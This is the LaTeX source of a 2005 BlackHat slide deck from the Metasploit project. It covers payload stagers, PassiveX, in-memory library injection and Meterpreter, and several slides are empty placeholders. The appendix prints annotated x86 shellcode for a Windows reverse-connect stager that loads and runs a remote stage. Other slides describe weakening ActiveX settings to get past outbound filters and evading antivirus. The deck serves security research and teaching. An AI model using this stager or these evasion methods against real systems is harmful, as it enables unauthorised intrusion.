metasploit-framework/dev/bh/bh05.tex

790 lines
23 KiB
TeX
Raw Normal View History

\documentclass{beamer}
\usepackage{graphicx}
\usepackage{color}
\mode<presentation> { }
\usepackage[english]{babel}
\usepackage[latin1]{inputenc}
\usepackage{times}
\usepackage[T1]{fontenc}
% I think this looks cool, but whateva! - skape
%\usepackage{beamerthemeshadow}
% Love from spoon
\newcommand{\pdfpart}[1]{\label{pdfpart-#1}\pdfbookmark[0]{#1}{pdfpart-#1}\part{#1}}
\newenvironment{sitemize}{\vspace{1mm}\begin{itemize}\itemsep 4pt\small}{\end{itemize}}
\newenvironment{senumerate}{\vspace{1mm}\begin{enumerate}\itemsep 4pt\small}{\end{enumerate}}
% Presentation meta-information
\title{Beyond EIP}
\author[spoonm \& skape] {spoonm \& skape}
\date[BlackHat 2005] {BlackHat, 2005}
\subject{Beyond EIP}
% Add a spacer between each part
\AtBeginPart{\frame{\partpage}}
% Turn off the navigation on the bottom yo
\setbeamertemplate{navigation symbols}{}
% spoon hates berkeley!
%\usetheme[width=2.2cm]{Berkeley}
%\usecolortheme{sidebartab}
\begin{document}
\begin{frame}[t]
\titlepage
\end{frame}
\part{Introduction}
\section{Introduction}
\begin{frame}[t]
\frametitle{Who are we?}
\begin{sitemize}
\item spoonm
\begin{sitemize}
\item Full-time student
\item Metasploit developer since late 2003
\end{sitemize}
\item skape
\begin{sitemize}
\item Lead software developer by day
\item Independent security researcher by night
\item Joined the Metasploit project in 2004
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{What will we discuss?}
\begin{sitemize}
\item Payload stagers
\begin{sitemize}
\item Windows Ordinal Stagers
\item PassiveX
\end{sitemize}
\pause
\item Payload stages
\begin{sitemize}
\item Library Injection
\item The Meterpreter
\item DispatchNinja
\end{sitemize}
\pause
\item Post-exploitation suites
\begin{sitemize}
\item Very hot area of research for the Metasploit team
\item Suites built off of advanced payload research
\item Client-side APIs create uniform automation interfaces
\item Primary focus of Metasploit 3.0
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Background: the exploitation cycle}
\begin{sitemize}
\item \textbf{Pre-exploitation} - Before the attack
\begin{sitemize}
\item Find a bug and isolate it
\item Write the exploit, payloads, and tools
\end{sitemize}
\pause
\item \textbf{Exploitation} - Leveraging the vulnerability
\begin{sitemize}
\item Find a vulnerable target
\item Gather information
\item Initialize tools and post-exploitation handlers
\item Launch the exploit
\end{sitemize}
\pause
\item \textbf{Post-exploitation} - Manipulating the target
\begin{sitemize}
\item Command shell redirection
\item Arbitrary command execution
\item Pivoting
\item Advanced payload interaction
\end{sitemize}
\end{sitemize}
\end{frame}
\pdfpart{Exploitation Technology's State of Affairs}
\section{Pre-exploitation}
\begin{frame}[t]
\frametitle{Payload encoders}
\begin{sitemize}
\item Robust and elegant encoders do exist
\begin{sitemize}
\item SkyLined's Alpha2 x86 alphanumeric encoder
\item Spoonm's high-permutation Shikata Ga Nai
\end{sitemize}
\pause
\item Payload encoders generally taken for granted
\begin{sitemize}
\item Most encoders use a static decoder stub
\item Makes NIDS signatures easy to write
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{NOP generators}
\begin{sitemize}
\item NOP generation hasn't publicly changed much
\begin{sitemize}
\item Most PoC exploits use predictable single-byte NOPs (\texttt{0x90}), if any
\item ADMmutate's NOP generator easily signatured by NIDS (Snort, Fnord)
\item Not considered an important research topic to most
\end{sitemize}
\pause
\item Still, NIDS continues to play chase the tail
\begin{sitemize}
\item The mouse always has the advantage; NIDS is reactive
\item Advanced NOP generators and encoders push NIDS to its limits
\item Many protocols can be complex to signature (DCERPC fragmentation)
\end{sitemize}
\pause
\item Metasploit 2.4 released with a wide-distribution
multi-byte x86 NOP generator (Opty2)
\end{sitemize}
\end{frame}
\section{Exploitation}
\begin{frame}[t]
\frametitle{Exploitation techniques}
\begin{sitemize}
\item Exploitation techniques have become very mature
\begin{sitemize}
\item Linux/BSD/Solaris techniques are largely unchanged
\item Windows heap overflows can be made more reliable (Oded/Shok)
\item Windows SEH overwrites make exploitation easy, even on XPSP2
\end{sitemize}
\pause
\item Exploitation vectors have been beaten to death
\pause
\item ...so we wont be talking about them
\end{sitemize}
\end{frame}
\section{Post-exploitation}
\begin{frame}[t]
\frametitle{Standard payloads}
\begin{sitemize}
\item Standard payloads provide the most basic manipulation
of a target
\begin{sitemize}
\item Port-bind command shell
\item Reverse (connectback) command shell
\item Arbitrary command execution
\end{sitemize}
\pause
\item Nearly all PoC exploits use standard payloads
\pause
\item Command shells have poor automation support
\begin{sitemize}
\item Platform dependent intrinsic commands and
scripting
\item Reliant on the set of applications installed on the
machine
\item Hindered by chroot jails and host-based ACLs
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{``Advantage'' payloads}
\begin{sitemize}
\item Advantage payloads provide enhanced manipulation of
hosts, commonly through the native API
\item Help to reduce the tediousness of writing payloads
\item Core ST's InlineEgg
% TODO: Elaborate on InlineEgg
% TODO: others...
\end{sitemize}
\end{frame}
\pdfpart{Payload Stagers}
\begin{frame}[t]
\frametitle{What are payload stagers?}
\begin{sitemize}
\item Payload stagers are small stubs that load and execute other
payloads
\item The payloads that are executed are known as stages
\item Stages perform arbitrary tasks, such as spawning a
shell
\pause
\item Stagers are typically network based and follow three
basic steps
\begin{sitemize}
\item Establish connection to attacker (reverse,
portbind, findsock)
\item Read in a payload from the connection
\item Execute a payload with the connection in known a register
\end{sitemize}
\pause
\item The three steps make it so stages are connection method
independent
\begin{sitemize}
\item No need to have command shell payloads for
reverse, portbind, and findsock
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Why are payload stagers useful?}
\begin{sitemize}
\item Some vulnerabilities have limited space for the
initial payload
\pause
\item Typically much smaller than the stages
they execute
\pause
\item Eliminate the need to re-implement payloads for each
connection method
\pause
\item Provide an abstract way for getting arbitrary code
onto a remote machine through any medium
\end{sitemize}
\end{frame}
\section{Windows Ordinal Stagers}
\subsection{Overview}
\begin{frame}[t]
\frametitle{Windows ordinal stagers}
\begin{sitemize}
\item Technique from Oded's lightning talk at core04
\item Uses static ordinals in \texttt{WS2\_32.DLL} to locate symbol
addresses
\item Compatible with all versions of Windows (including 9X)
\item Results in very low-overhead symbol resolution
\item Facilitates implementation of reverse, portbind, and
findsock stagers
\item Leads to very tiny win32 stagers (92 byte reverse, 93
byte findsock)
\item Technical write-up at
\footnotesize{\url{http://www.metasploit.com/users/spoonm/ordinals.txt}}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{How ordinal stagers work}
\begin{sitemize}
\item Ordinals are unique numbers that identify exported
symbols in PE files
\item Each ordinal can be used to resolve the address of an
exported symbol
\pause
\item Most of the time, ordinals are incremented linearly by the
linker
\item Sometimes, however, developers may wish to force
symbols to use the same ordinal every build
\item When ordinals are the same every build, they are
referred to as static
\pause
\item Using an image's exports by ordinal instead of by name
is more efficient at runtime
\item However, it will not be reliably portable unless the
ordinals are known-static
\pause
\item Very few PE files use known-static ordinals, but
\texttt{WS2\_32.DLL} is one that does
\begin{sitemize}
\item 30 symbols use static ordinals in
\texttt{WS2\_32.DLL}
\end{sitemize}
\end{sitemize}
\end{frame}
\subsection{Implementation}
\begin{frame}[t]
\frametitle{Implementing a reverse ordinal stager}
\begin{sitemize}
\item Locate the base address of \texttt{WS2\_32.DLL}
\begin{sitemize}
\item Extract the Peb->Ldr pointer
\item Extract Flink from the InInitOrderModuleList
\item Loop through loaded modules comparing module names
\item Module name is stored in unicode, but can be
partially translated to ANSI
\item Once \texttt{WS2\_32.DLL} is found, extract its
BaseAddress
\end{sitemize}
\pause
\item Resolve \texttt{socket}, \texttt{connect},
and \texttt{recv}
\begin{sitemize}
\item Use static ordinals to index the Export Directory Address Table
\end{sitemize}
\pause
\item Allocate a socket, connect to the attacker,
and read in the next payload
\pause
\item Requires that \texttt{WS2\_32.DLL} already be loaded
in the target process
\end{sitemize}
\end{frame}
\section{PassiveX}
\subsection{Overview}
\begin{frame}[t]
\frametitle{PassiveX}
\begin{sitemize}
\item Robust payload stager capable of bypassing restrictive
outbound filters
\item Compatible with Windows 2000+ running Internet
Explorer 6.0+
\item Uses HTTP to communicate with attacker
\item Provides an alternate vector for library injection via
ActiveX
\item Technical write-up at
\footnotesize{\url{http://www.uninformed.org/?v=1&a=3&t=sumry}}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{How PassiveX works}
\begin{sitemize}
\item Enables support for both signed and unsigned ActiveX
controls in the \texttt{Internet} zone.
\begin{sitemize}
\pause
\item Necessary because administrators may have disabled
ActiveX support for security reasons
\end{sitemize}
\pause
\item Launches a hidden instance of Internet Explorer
\pause
\item Internet Explorer loads a page that the attacker
has put an embedded ActiveX control on
\pause
\item Internet Explorer loads and executes the ActiveX
control
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Why is PassiveX useful?}
\begin{sitemize}
\item Relatively small (roughly 400 byte) stager that does not
directly interact with the network
\pause
\item Bypasses common outbound filters by tunneling through
HTTP
\pause
\item Automatically uses proxy settings defined in Internet
Explorer
\pause
\item Bypasses trusted application restrictions (ZoneAlarm)
\pause
\item ActiveX technology allows the attacker to implement
complex code in higher level languages (C, C++, VB)
\begin{sitemize}
\item Eliminates the need to perform complicated tasks
from assembly
\item ActiveX controls are functionally equivalent to
executables
\end{sitemize}
\end{sitemize}
\end{frame}
\subsection{Implementation}
\begin{frame}[t]
\frametitle{Implementing the PassiveX stager}
\begin{sitemize}
\item Enable download and execution of ActiveX controls
\begin{sitemize}
\item Open the current user's \texttt{Internet} zone
registry key
\item Enable four settings
\begin{sitemize}
\item \texttt{Download signed ActiveX controls}
\item \texttt{Download unsigned ActiveX controls}
\item \texttt{Run ActiveX controls and plugins}
\item \texttt{Initialize and script ActiveX controls not
marked as safe}
\end{sitemize}
\end{sitemize}
\pause
\item Launch a hidden instance of Internet Explorer pointed
at a URL the attacker controls
\pause
\item Internet Explorer then loads and executes the attacker's
ActiveX control
\end{sitemize}
\end{frame}
\subsection{HTTP Tunneling ActiveX Control}
\begin{frame}[t]
\frametitle{An example ActiveX control}
\begin{sitemize}
\item ActiveX controls may choose to build an HTTP tunnel
to the attacker
\item HTTP tunnels provide a streaming connection over HTTP
requests and responses
\item Useful for tunneling other protocols, like TCP,
through HTTP
% TODO: elaborate?
\end{sitemize}
\end{frame}
\subsection{Pros \& Cons}
\begin{frame}[t]
\frametitle{Pros \& cons}
\begin{sitemize}
\item \textbf{Pros}
\begin{sitemize}
\item Bypasses restrictive outbound filters at both a
network and application level
\pause
\item Provides a method for using complex code written
in a high-level language
\end{sitemize}
\pause
\item \textbf{Cons}
\begin{sitemize}
\item Does not work when run as a non-privileged user
\begin{sitemize}
\item Internet Explorer refuses to download ActiveX
controls
\end{sitemize}
\pause
\item Requires the ActiveX control to restore
\texttt{Internet} zone settings
\begin{sitemize}
\item May leave the machine vulnerable to compromise
if not done
\end{sitemize}
\end{sitemize}
\end{sitemize}
\end{frame}
\pdfpart{Payload Stages}
\begin{frame}[t]
\frametitle{What are payload stages?}
\begin{sitemize}
\item Payload stages are executed by payload stagers and
perform arbitrary tasks
\pause
\item Some examples of payload stages include
\begin{sitemize}
\item Execute a command shell and redirect IO to the
attacker
\item Execute an arbitrary command
\item Download an executable from a URL and execute it
\end{sitemize}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Why are payload stages useful?}
\begin{sitemize}
\item Can be executed independent of connection method
(portbind, reverse)
\begin{sitemize}
\item All stagers store the connection file descriptor
in a common register
\end{sitemize}
\pause
\item Not subject to size limitations of individual
vulnerabilities
\end{sitemize}
\end{frame}
\section{Library Injection}
\subsection{Overview}
\begin{frame}[t]
\frametitle{The library injection stage}
\begin{sitemize}
\item Payload stage that provides a method of loading a
library (DLL) into the exploited process
\pause
\item Libraries are functionally equivalent to executables
\begin{sitemize}
\item Full access to various OS-provided APIs
\item Can do anything an executable can do
\end{sitemize}
\pause
\item Library injection is covert; no new processes
need to be created
\pause
\item Technical write-up at \\
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf}}
% TODO: elaborate?
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Types of library injection}
\begin{sitemize}
\item Three primary methods exist to inject a library
\begin{senumerate}
\item \textbf{On-Disk}: loading a library from the target's
harddrive or a file share
\item \textbf{In-Memory}: loading a library entirely from memory
\item \textbf{ActiveX}: loading a library through Internet
Explorer's ActiveX support
\end{senumerate}
\item On-Disk and In-Memory techniques are conceptually
portable to non-Windows platforms
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{On-Disk library injection}
\begin{sitemize}
\item Loading a library from disk has been the defacto
standard for Windows payloads
\item Loading a library from a file share first
discussed by Brett Moore
\pause
\item Subject to filtering by Antivirus due to
filesystem access
\item Requires that the library file exist on the target's
harddrive or that the file share be reachable
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{In-Memory library injection}
\begin{sitemize}
\item First Windows implementation released with Metasploit 2.2
\pause
\item Libraries are loaded entirely from memory
\pause
\item No disk access means no Antivirus interference
\pause
\item Most stealthy form of library injection thus far
identified
\end{sitemize}
\end{frame}
\subsection{Implementation on Windows}
\begin{frame}[t]
\frametitle{Implementing In-Memory library injection on Windows}
\begin{sitemize}
\item Loading libraries from memory means tricking the
native loader provided in \texttt{NTDLL.DLL}
\end{sitemize}
\end{frame}
\begin{frame}[t]
\frametitle{Library injection in action: VNC}
\end{frame}
\section{Meterpreter}
\begin{frame}[t]
\frametitle{Overview}
\end{frame}
\begin{frame}[t]
\frametitle{Design goals}
\end{frame}
\begin{frame}[t]
\frametitle{Communication protocol specification}
\end{frame}
\begin{frame}[t]
\frametitle{Client/Server architecture}
\end{frame}
\begin{frame}[t]
\frametitle{Extension flexibilities}
\end{frame}
\begin{frame}[t]
\frametitle{Meterpreter extensions in action: Stdapi}
\end{frame}
\section{DispatchNinja}
\begin{frame}[t]
\frametitle{Cool dN stuff here}
\end{frame}
\pdfpart{Post-Exploitation Suites}
\section{Post-Exploitation Suites}
\subsection{Motivations \& Goals}
\begin{frame}[t]
\frametitle{stuff}
\end{frame}
\pdfpart{Conclusion}
\begin{frame}[t]
\frametitle{Reference Material}
\textbf{Payload Stagers}
\begin{sitemize}
\item Windows Ordinal Stagers \\
\footnotesize{\url{http://www.metasploit.com/users/spoonm/ordinals.txt}}
\item PassiveX \\
\footnotesize{\url{http://www.uninformed.org/?v=1&a=3&t=sumry}}
\end{sitemize}
\textbf{Payload Stages}
\begin{sitemize}
\item Library Injection \\
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf}}
\end{sitemize}
\end{frame}
\appendix
\pdfpart{Appendix: Payload Stagers}
\section{Windows Ordinal Stagers}
\subsection{Reverse Ordinal Stager Implementation}
\begin{frame}[fragile]
\frametitle{Locating WS2\_32.DLL's base address}
\footnotesize{
\begin{verbatim}
FC cld ; clear direction (lodsd)
31DB xor ebx,ebx ; zero ebx
648B4330 mov eax,[fs:ebx+0x30] ; eax = PEB
8B400C mov eax,[eax+0xc] ; eax = PEB->Ldr
8B501C mov edx,[eax+0x1c] ; edx = Ldr->InitList.Flink
8B12 mov edx,[edx] ; edx = LdrModule->Flink
8B7220 mov esi,[edx+0x20] ; esi = LdrModule->DllName
AD lodsd ; eax = [esi] ; esi += 4
AD lodsd ; eax = [esi] ; esi += 4
4E dec esi ; esi--
0306 add eax,[esi] ; eax = eax + [esi]
; (4byte unicode->ANSI)
3D32335F32 cmp eax,0x325f3332 ; eax == 2_32?
75EF jnz 0xd ; not equal, continue loop
\end{verbatim}
}
\end{frame}
\begin{frame}[fragile]
\frametitle{Resolve symbols using static ordinals}
\footnotesize{
\begin{verbatim}
8B6A08 mov ebp,[edx+0x8] ; ebp = LdrModule->BaseAddr
8B453C mov eax,[ebp+0x3c] ; eax = DosHdr->e_lfanew
8B4C0578 mov ecx,[ebp+eax+0x78]; ecx = Export Directory
8B4C0D1C mov ecx,[ebp+ecx+0x1c]; ecx = Address Table Rva
01E9 add ecx,ebp ; ecx += ws2base
8B4158 mov eax,[ecx+0x58] ; eax = socket rva
01E8 add eax,ebp ; eax += ws2base
8B713C mov esi,[ecx+0x3c] ; esi = recv rva
01EE add esi,ebp ; esi += ws2base
03690C add ebp,[ecx+0xc] ; ebp += connect rva
\end{verbatim}
}
\end{frame}
\begin{frame}[fragile]
\frametitle{Create the socket, connect back, recv, and jump}
\footnotesize{
\begin{verbatim}
; Use chained call-stacks to save space
; connect returns to recv returns to buffer (fd in edi)
53 push ebx ; push 0
6A01 push byte +0x1 ; push SOCK_STREAM
6A02 push byte +0x2 ; push AF_INET
FFD0 call eax ; call socket
97 xchg eax,edi ; edi = fd
687F000001 push dword 0x100007f ; push sockaddr_in
68020010E1 push dword 0xe1100002
89E1 mov ecx,esp ; ecx = &sockaddr_in
53 push ebx ; push flags (0)
B70C mov bh,0xc ; ebx = 0x0c00
53 push ebx ; push length (0xc00)
51 push ecx ; push buffer
57 push edi ; push fd
51 push ecx ; push buffer
6A10 push byte +0x10 ; push addrlen (16)
51 push ecx ; push &sockaddr_in
57 push edi ; push fd
56 push esi ; push recv
FFE5 jmp ebp ; call connect
\end{verbatim}
}
\end{frame}
\end{document}